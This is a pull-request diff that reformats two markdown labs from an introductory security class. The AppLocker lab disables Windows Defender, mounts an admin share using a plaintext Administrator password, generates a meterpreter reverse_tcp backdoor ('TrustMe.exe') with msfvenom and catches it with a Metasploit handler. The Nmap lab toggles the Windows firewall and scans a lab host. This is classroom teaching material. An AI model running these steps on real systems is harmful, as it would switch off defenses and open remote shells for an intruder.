Merge pull request #4 from KAISERaustin/KAISER-edits

KAISER attempted to update AppLocker and Nmap.

Author: KAISERaustin

IntroClassFiles/Tools/IntroClass/AppLocker/AppLocker.md

@@ -1,101 +1,74 @@
 
 # AppLocker
 
-
 Applocker Instructions:
 
-Let’s see what happens when we do not have AppLocker running.  We will set up a simple backdoor and have it connect back to the Ubuntu system.  Remember, the goal is not to show how we can bypass EDR and Endpoint products.  It is to create a simple backdoor and have it connect back.
+Let’s see what happens when we do not have **AppLocker** running.  We will set up a simple backdoor and have it connect back to the **Ubuntu** system.  Remember, the goal is not to show how we can bypass **EDR** and **Endpoint** products.  It is to create a simple backdoor and have it connect back.
 
-Before we begin, we need to disable Defender. Start by opening an instance of Windows Powershell. Do this by clicking on the Powershell icon in the taskbar.
+Before we begin, we need to disable **Defender**. Start by opening an instance of Windows **Powershell**. Do this by clicking on the **Powershell** icon in the taskbar.
 
 ![](attachments/OpeningPowershell.png)
 
-Next, run the following command in the Powershell terminal:
+Next, run the following command in the **Powershell** terminal:
 
-<pre>Set-MpPreference -DisableRealtimeMonitoring $true</pre>
+`Set-MpPreference -DisableRealtimeMonitoring $true`
 
 ![](attachments/applocker_disabledefender.png)
 
 This will disable Defender for this session.
 
-If you get angry red errors, that is Ok, it means Defender is not running.
+If you get angry red errors, that is ==**Ok**==, it means **Defender** is not running.
 
-Let’s get started by opening a Kali instance.
+Let’s get started by opening a **Kali** instance.
 
 ![](attachments/OpeningKaliInstance.png)
 
-Alternatively, you can click on the Kali icon in the taskbar.
+Alternatively, you can click on the **Kali** icon in the taskbar.
 
 ![](attachments/TaskbarKaliIcon.png)
 
-####NOTE##### 
-
-If you are having trouble with Windows Terminal, you can simply start each of the three shells, we use by starting them directly from the Windows Start button. 
-
- 
-
-Simply click the Windows Start button in the lower left of your screen and type: 
-
- 
-
-`Powershell` 
-
-or 
-
-`Ubuntu`
-
-or 
-
-`Command Prompt` 
-
- 
-
-For PowerShell and Command Prompt, please right click on them and select Run As Administrator 
-
-###END NOTE###
-
 Let's start by getting root access in our terminal.
 
-<pre>sudo su -</pre>
+`sudo su -`
 
 Next, lets run the following command to get our IP address:
 
-<pre>ifconfig</pre>
+`ifconfig`
 
-Please note the IP address of your Ethernet adapter.
+==**Please note the IP address of Y-O-U-R Ethernet adapter.**==
 
 ![](attachments/applocker_ifconfig.png)
 
-Please note that my adapter is called `eth0` and my IP address is `10.10.1.117` Your IP Address and adapter name may be different.
-
-Remember this IP by writing it down, etc.
+Please note that my adapter is called **"eth0"** and my IP address is **"10.10.1.117"** Your IP Address and adapter name may be different.
 
 First, we need to run the following command in order to mount our remote system to the correct directory:
 
-<pre>mount -t cifs //10.10.1.209/c$ /mnt/windows-share -o username=Administrator,password=T@GEq5%r2XJh</pre>
+`mount -t cifs //10.10.1.209/c$ /mnt/windows-share -o username=Administrator,password=T@GEq5%r2XJh`
 
-Now, run the following commands to start a simple backdoor and backdoor listener: 
+Run the following commands to start a simple backdoor and backdoor listener: 
 
-<pre>msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp lhost=<YOUR LINUX IP> lport=4444 
--f exe -o /tmp/TrustMe.exe</pre>
+`msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp lhost=<YOUR LINUX IP> lport=4444 
+-f exe -o /tmp/TrustMe.exe`
 
 `cd /tmp`
 
 `ls -l TrustMe.exe`
 
-
 `cp ./TrustMe.exe /mnt/c/tools`
 
+Let's start the **Metasploit Handler**.  First, open a new Ubuntu Terminal by clicking the down carrot then selecting Ubuntu-18.04.
 
-Now, let's start the Metasploit Handler.  First, open a new Ubuntu Terminal by clicking the down carrot then selecting Ubuntu-18.04.
+This is what your terminal will look like before getting root.  
+
+==root@DESKTOP-I1T2G01:/tmp#== `msfconsole -q`
 
 Let's become root.
 
 `sudo su -`
 
-root@DESKTOP-I1T2G01:/tmp# `msfconsole -q`
+==msf5== > `use exploit/multi/handler`
 
-msf5 > `use exploit/multi/handler`
+The Metasploit Handler successfully ran if the terminal now starts with "**msf5**"
 
 msf5 exploit(multi/handler) > `set PAYLOAD windows/meterpreter/reverse_tcp`
 
@@ -107,7 +80,6 @@ Remember, your IP will be different!
 
 msf5 exploit(multi/handler) > `exploit`
 
-
 It should look like this:
 
 ![](attachments/Clipboard_2020-06-12-12-46-10.png)

IntroClassFiles/Tools/IntroClass/Nmap/Nmap.md

@@ -1,7 +1,7 @@
 
 # Host Firewalls and Nmap
 
-In this lab we will be scanning your Windows system from your Linux terminal with the firewall both on and off. 
+In this lab we will be scanning your **Windows** system from your **Linux** terminal with the firewall both on and off. 
 
 The goal is to show you how a system is very different to the network with a firewall enabled. 
 
@@ -11,7 +11,7 @@ Let's get started by opening a command prompt terminal. You can do this by click
 
 ![](attachments/openingcommandprompt%20-%20Copy.png)
 
-####NOTE##### 
+From the command prompt we need to get the IP address of your **Windows** system:
 
 If you are having trouble with Windows Terminal, you can simply start each of the three shells, we use by starting them directly from the Windows Start button. 
 
@@ -53,7 +53,7 @@ Alternatively, you can click on the Kali logo in the taskbar.
 
 ![](attachments/TaskbarKaliIcon.png)
 
-Next, let’s become root:
+Let’s become root:
 
 <pre>sudo su -</pre>
 
@@ -69,12 +69,11 @@ It should look like this:
 
 Please note the open ports. These are ports and services that an attacker could use to authenticate to your system.  Or, attack if an exploit is available. 
 
-
-Now, let’s go back to the Windows command prompt, by clicking the icon in the taskbar.
+Let’s go back to the Windows command prompt, by selecting the Administrator: Command Prompt tab.
 
 ![](attachments/openingcommandprompt%20-%20Copy.png)
 
-Now, let’s enable the Windows firewall:
+Let’s enable the Windows firewall:
 
 <pre>netsh advfirewall set allprofiles state on</pre>
 
@@ -84,7 +83,7 @@ Now, let’s rescan from the Kali terminal. You can navigate back to it by press
 
 ![](attachments/TaskbarKaliIcon.png)
 
-Then, rerun the scan
+Rerun the scan
 
 <pre>nmap 10.10.1.209</pre>
 
@@ -96,16 +95,8 @@ It should look like this:
 
 ![](attachments/nmap_nmapscanwfirewall.png)
 
-
 Now, using the same process as before, let’s disable the Windows firewall to go back to the base state:
 
 <pre>netsh advfirewall set allprofiles state off</pre>
 
 ![](attachments/nmap_turnbackon.png)
-
-
-
-
-
-
-